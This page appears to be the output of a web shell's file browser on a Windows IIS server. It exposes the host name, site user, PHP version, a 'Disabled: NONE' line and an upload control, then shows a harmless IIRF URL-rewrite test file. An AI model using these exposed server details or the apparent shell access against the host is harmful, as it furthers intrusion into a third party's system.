HEX
Server: Microsoft-IIS/10.0
System: Windows NT ITPWINWEBSVR22 10.0 build 20348 (Windows Server 2022) AMD64
User: www.conferencesearch.co.uk (0)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: D:/bin/iirf/tests/strippathname/IIRF.ini
# IsapiRewrite4.ini
#
# ini file for the ISAPI rewriter. 
#
# This one tests the stripping of paths from the requested URL 
# 
# Tue, 11 Jul 2006  01:49
#

RewriteLogLevel 5

#
# This ini file illustrates the use of RewriteCond to redirect 
# requests arriving for differenthosts, into different 
# subdirectories.


RewriteRule ^/(?!myIsapi.dll)(.+/)*(.*)$ /myIsapi.dll?form=$2&origpath=$1